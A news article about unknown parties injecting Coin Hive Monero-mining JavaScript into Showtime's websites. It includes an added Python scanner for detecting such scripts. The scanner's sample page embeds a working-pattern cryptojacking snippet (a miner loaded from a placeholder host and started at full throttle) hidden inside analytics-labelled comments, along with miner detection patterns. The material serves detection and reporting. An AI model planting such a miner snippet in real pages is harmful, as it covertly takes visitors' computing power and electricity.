CBS's Showtime caught mining crypto-coins in viewers' web browsers

Who placed the JavaScript code on two primetime dot-coms? So far, it's a mystery


The websites of US telly giant CBS's Showtime contained JavaScript that secretly commandeered viewers' web browsers over the weekend to mine cryptocurrency.

The flagship and its instant-access sibling silently pulled in code that caused browsers to blow spare processor time calculating new Monero coins – a privacy-focused alternative to the ever-popular Bitcoin. The hidden software typically consumed as much as 60 per cent of CPU capacity on computers visiting the sites.

The scripts were written by Coin Hive, a legit outfit that provides JavaScript to website owners: webmasters add the code to their pages so that they can earn slivers of cash from each visitor as an alternative to serving adverts to generate revenue. Over time, money mined by the Coin-Hive-hosted scripts adds up and is transferred from Coin Hive to the site's administrators. One Monero coin, 1 XMR, is worth about $92 right now.

However, it's extremely unlikely that a large corporation like CBS would smuggle such a piece of mining code onto its dot-coms – especially since it charges subscribers to watch the hit TV shows online – suggesting someone hacked the websites' source code to insert the mining JavaScript and make a quick buck.

The JavaScript, which appeared on the sites at the start of the weekend and vanished by Monday, sits between HTML comment tags that appear to be an insert from web analytics biz New Relic. Again, it is unlikely that an analytics company would deliberately stash coin-mining scripts onto its customers' pages, so the code must have come from another source – or was injected by miscreants who had compromised Showtime's systems.
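The tell-tale signs described above (a script tag loaded early in the page, wrapped in HTML comments that name a legitimate analytics vendor, pulling in a miner library and starting it) are exactly what a site owner's own integrity check should look for. The scanner below is an added example, not code from The Register, Showtime, New Relic or Coin Hive: it walks a page's HTML, records every script tag with its position and the comment immediately preceding it, and flags those whose source host or inline body matches miner indicators. The indicator patterns, the hostname and the sample page are all constructed placeholders; a real deployment would feed it the blocklists that ad blockers and threat-intel vendors maintain.

```python
"""Flag injected in-browser mining scripts in an HTML document.

Added example for illustration; not the code of any company named in the
article. Indicator patterns and the sample page are constructed placeholders.
"""
import re
from html.parser import HTMLParser

# Assumed indicators (placeholders): tokens seen in miner library URLs and in
# the inline code that instantiates and starts a miner.
MINER_HOST_PATTERNS = [
    re.compile(r"coin-?hive", re.I),          # assumed library host/path token
]
MINER_INLINE_PATTERNS = [
    re.compile(r"\bCoinHive\.(Anonymous|User)\b"),   # assumed constructor name
    re.compile(r"\bminer\.start\s*\(", re.I),         # assumed start call
]


class MinerScanner(HTMLParser):
    """Collect each <script>, its load order, line and the comment before it."""

    def __init__(self):
        super().__init__()
        self.script_index = 0       # load order: 1 = first script on the page
        self.last_comment = None    # most recent HTML comment text
        self._current = None
        self.findings = []

    def handle_comment(self, data):
        self.last_comment = data.strip()

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        self.script_index += 1
        self._current = {
            "index": self.script_index,
            "line": self.getpos()[0],
            "src": dict(attrs).get("src"),
            "preceding_comment": self.last_comment,
            "inline": "",
        }

    def handle_data(self, data):
        # HTMLParser treats <script> bodies as raw data, so this is the JS text.
        if self._current is not None:
            self._current["inline"] += data

    def handle_endtag(self, tag):
        if tag.lower() != "script" or self._current is None:
            return
        self._classify(self._current)
        self._current = None

    def _classify(self, script):
        reasons = []
        src = script["src"] or ""
        if any(p.search(src) for p in MINER_HOST_PATTERNS):
            reasons.append("src matches known miner host")
        if any(p.search(script["inline"]) for p in MINER_INLINE_PATTERNS):
            reasons.append("inline code references miner API")
        if reasons:
            script["reasons"] = reasons
            self.findings.append(script)


def scan_html(html):
    """Return the list of suspicious scripts found in the document."""
    parser = MinerScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


def report(findings):
    """Render findings as one line each, ready for a log or ticket."""
    return [
        f"script #{f['index']} (line {f['line']}, src={f['src']!r}, "
        f"after comment={f['preceding_comment']!r}): {', '.join(f['reasons'])}"
        for f in findings
    ]


# Constructed sample mimicking the layout the article describes: a miner
# hidden between comments that name an analytics vendor, loaded early.
SAMPLE_PAGE = """<!DOCTYPE html>
<html><head>
<!-- New Relic browser agent (constructed sample) -->
<script src="https://coinhive.example.invalid/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('SITEKEY_PLACEHOLDER', {throttle: 0});
miner.start();
</script>
<!-- end New Relic (constructed sample) -->
<script src="https://cdn.example.invalid/analytics.js"></script>
</head><body><p>Hello</p></body></html>
"""

if __name__ == "__main__":
    for line in report(scan_html(SAMPLE_PAGE)):
        print(line)
```

Run against a saved copy of your own pages (or the HTML fetched by a synthetic monitor) on a schedule and diff the output against a known-good baseline; a new script appearing at position one or two, especially one nested inside vendor-labelled comments, is worth a page to the on-call engineer even when no indicator matches.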

Here's a screenshot of the code on the flagship site, seen by El Reg before it was removed. The mining script was loaded early on the page, we note.


And on Showtime Anytime:


We contacted both Showtime and New Relic today asking for more details. Showtime refused to comment. New Relic told us it had nothing to do with the mystery code.

"We take the security of our browser agent extremely seriously and have multiple controls in place to detect malicious or unauthorized modification of its script at various points along its development and deployment pipeline," New Relic's Andrew Schmitt told us.

"Upon reviewing our products and code, the HTML comments shown in the screenshot that are referencing newrelic were not injected by New Relic's agents. It appears they were added to the website by its developers."

We also asked Coin Hive for details on the user account the injected code was mining for. "We can't give out any specific information about the account owner as per our privacy terms," the outfit informed us. "We don't know much about these keys or the user they belong to anyway."

The outfit did confirm to us, however, that the email address used to set up the account was a personal one, and was not an official CBS email address, further suggesting malicious activity.

Pirate Bay

Coin Hive's mining code was at the center of some attention last week when file-sharing search engine The Pirate Bay admitted it had added the coin-gathering JavaScript on its pages in order to test its profitability in an effort to get rid of ads on its site.

The code was poorly configured – web admins are allowed to set the hashing rate – and resulted in people's machines slowing to a crawl, sparking complaints. Following the outcry, The Pirate Bay acknowledged the presence of the mining script, calling it "only a test," and promised to limit the CPU usage to make it less annoying. A few days later, the organization dropped the idea altogether.

Coin Hive not only offers in-page mining but also mining through URL shorteners and CAPTCHAs. The huge advantage to the website operator using the code is that the script uses not only someone else's processing power but also their electricity, meaning that you can make money with very little effort – so long as you are willing to annoy your visitors.

Coin Hive's pitch is that this script could allow publishers to pull annoying ads from their websites – which is something that could become more important as browsers increasingly block ads.

However, the code has already been inserted in browser extensions and on typosquatted websites. And now, it looks as though someone may have tried to hack Showtime's website in order to insert the code and make money while not having any direct impact on the website itself.

If Coin Hive wants to be seen as legitimate rather than a tool for hackers and malware authors, it is going to have to rapidly figure out a better authorization system for big websites and work on making itself less attractive to scammers. Meanwhile, ad blocking tools are now killing the JavaScript on sight. ®

Hat tip to Troy Mursch for alerting us to this mystery.
